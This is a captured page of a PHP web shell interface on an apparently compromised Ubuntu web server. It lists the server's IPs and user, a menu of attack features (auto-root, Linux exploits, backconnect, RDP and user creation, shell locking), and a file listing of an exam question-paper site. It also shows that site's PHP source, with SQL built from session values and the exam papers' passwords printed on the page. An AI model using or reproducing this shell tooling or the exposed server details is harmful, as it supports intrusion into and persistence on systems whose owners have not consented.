Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.94.221
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
demo /
qptran /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
PDF-Corrections-UG-Dec-11-Jan-...
35.27
KB
-rwxr-xr-x
___________________login.php
2.11
KB
-rwxr-xr-x
__userfunctions.php
5.87
KB
-rwxr-xr-x
_userfunctions.php
5.81
KB
-rwxr-xr-x
access-denied.php
905
B
-rwxr-xr-x
auth.php
258
B
-rwxr-xr-x
change_password1.php
1.11
KB
-rwxr-xr-x
changepass.php
3.79
KB
-rwxr-xr-x
collinfo_popup.css
5.97
KB
-rwxr-xr-x
collinfo_popup.js
11.62
KB
-rwxr-xr-x
config.php
193
B
-rwxr-xr-x
footer.php
298
B
-rwxr-xr-x
header.php
1.02
KB
-rwxr-xr-x
index.html
382
B
-rwxr-xr-x
jquery.min.js
93.54
KB
-rwxr-xr-x
link.php
225
B
-rwxr-xr-x
login-exec.php
2.04
KB
-rwxr-xr-x
login-failed.php
872
B
-rwxr-xr-x
login.php
4.11
KB
-rwxr-xr-x
login09022017.php
4.08
KB
-rwxr-xr-x
login_old.php
22.01
KB
-rwxr-xr-x
loginygen.php
95
B
-rwxr-xr-x
logout.php
853
B
-rwxr-xr-x
qptran.sql
5.05
KB
-rwxr-xr-x
send_info_sheet.php
13.74
KB
-rwxr-xr-x
style.css
2.09
KB
-rwxr-xr-x
userfunctions.php
6.72
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __userfunctions.php
<?php require_once('auth.php'); ?> <?php require_once('header.php'); ?> <style type="text/css"> <!-- .style22 {color: #FFFFFF; font-weight: bold; font-size: 14px; } .style33 { font-size: 18px; font-weight: bold; } .style35 { color: #000000; font-weight: bold; font-size: 14px; font-family: Georgia, "Times New Roman", Times, serif; } .style36 {color: #000000} .style37 {font-family: Georgia, "Times New Roman", Times, serif} .style38 {color: #000000; font-family: Georgia, "Times New Roman", Times, serif; } --> </style> <div class="cont"> <p> </p> <? $id1=$_SESSION['SESS_MEMBER_ID']; //echo"ID :".$id1; ?> <p align="center"><font size=4 face="Georgia, Times New Roman, Times, serif" color="#000000"><strong>DOWNLOAD QUESTION PAPERS</strong></font></p> <table width="800" border="0" align="center" cellpadding="4" cellspacing="1"> <tr> <td width="596"><a href="send_info_sheet.php">Send Information Sheet</a></td> <td width="132" height="36" style="padding-left:5px;"><a href="changepass.php">Change Password</a></td> <td width="44" height="36" style="padding-left:5px;"><a href="logout.php">Logout</a></td> </tr> </table> <? include('link.php'); $query123="SELECT * FROM usertable WHERE id='$id1'"; $result123=mysql_query($query123) or die("Query Failed".mysql_error()); $num123=mysql_num_rows($result123); if($num123 != 0) { while($row123=mysql_fetch_array($result123,MYSQL_ASSOC)) { ?> <table width="800" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="121" height="36" style="padding-left:5px;"><div align="center" class="style22 style36 style37"> <div align="left"><font style="padding-left:5px;"> College Name</font> : </div> </div></td> <td width="660" height="36" style="padding-left:5px;"><div align="center" class="style38"> <div align="left"><font size="2" style="padding-left:5px;"> <?=$row123{'collegename'}; ?> </font></div> </div></td> </tr> <!-- <tr> <td width="121" height="36" style="padding-left:5px;"><div align="center" class="style35"> <div align="left"><font style="padding-left:5px;">Location</font> : </div> </div></td> <td width="660" height="36" style="padding-left:5px;"><div align="center" class="style38"> <div align="left"><font size="2" style="padding-left:5px;"> <?=$row123{'location'}; ?> </font></div> </div></td> </tr> --> </table> <?php } } ?> </table> <? include('link.php'); $query="SELECT * FROM qptable WHERE status='enable' ORDER BY qdate DESC,qsession ASC"; $result=mysql_query($query) or die("Query Failed".mysql_error()); $num=mysql_num_rows($result); if($num != 0) { ?> <table width="800" border="0" align="center" cellpadding="4" cellspacing="1" bordercolor="#999999" bgcolor="#999999"> <tr> <td width="104" height="36" bgcolor="000080" style="padding-left:5px;"><div align="center" class="style22"><font style="padding-left:5px;">Date</font></div></td> <td width="107" height="36" bgcolor="000080" style="padding-left:5px;"><div align="center" class="style22"><font style="padding-left:5px;">Session</font></div></td> <td height="36" bgcolor="000080" style="padding-left:5px;"><div align="center" class="style22"><font style="padding-left:5px;">Download Here</font></div></td> <td width="150" height="36" bgcolor="000080" style="padding-left:5px;"><div align="center" class="style22"> <div align="center"><font style="padding-left:5px;">I Password</font></div> </div></td> <td width="150" height="36" bgcolor="000080" style="padding-left:5px;"><div align="center" class="style22"> <div align="center"><font style="padding-left:5px;">II Password</font></div> </div></td> </tr> <?php while($row=mysql_fetch_array($result,MYSQL_ASSOC)) { ?> <tr> <td width="104" height="36" bgcolor="#f4f2f3" style="padding-left:5px;"><div align="center"><font size="2" style="padding-left:5px;"> <?=$row{'qdate'}; ?> </font></div></td> <td width="107" height="36" bgcolor="#f4f2f3" style="padding-left:5px;"><div align="center"><font size="2" style="padding-left:5px;"> <?=$row{'qsession'}; ?> </font></div></td> <td width="243" height="36" bgcolor="#f4f2f3" style="padding-left:5px;"><div align="center"> <font size="2" style="padding-left:5px;"><a href="admin/attach-files/<?=$row{'qpaper'}; ?>"><?=$row{'qpaper'}; ?></a></font></div></td> <td width="150" height="36" bgcolor="#f4f2f3"><div align="center"><font size="2" face="Trebuchet MS"><?=$row{'password1'}; ?></font></div></td> <td width="150" height="36" bgcolor="#f4f2f3"><div align="center"><font size="2" face="Trebuchet MS"><?=$row{'password2'}; ?></font></div></td> </tr> <?php } ?> </table> <? include('link.php'); $query2="SELECT * FROM footnote WHERE status='enable' ORDER BY footnote_title ASC"; $result2=mysql_query($query2); while($noticia = mysql_fetch_array($result2)) { ?> <table width="800" border="0" align="center" cellpadding="4" cellspacing="1" bordercolor="#999999" bgcolor="#999999"> <tr> <td bgcolor="#f4f2f3" style="padding-left:5px;"><div align="center"><font size="2" style="padding-left:5px;"> <textarea type="text" name="footnote_content" rows="25" cols="125" value="<?= $noticia['footnote_content'] ?>" readonly="readonly" style="border:1px solid #000000; font-family: Verdana; font-size: 12px; background-color:#F8F7FD" /> <?= $noticia['footnote_content'] ?></textarea> </font></div></td> </tr> </table> <p> <? } ?> </p> <p> <? } else { ?> </p> <table width="600" height="100" border="0" align="center" cellpadding="2" cellspacing="1"> <tbody> <tr> <td class="Display_msg"> <div align="center" class="style33">Question Papers not yet uploaded.</div></td> </tr> </tbody> </table> <p> <? } ?> </p> <p> </p> <p> </p> <p> </p> </div> <? include("footer.php"); ?>
Close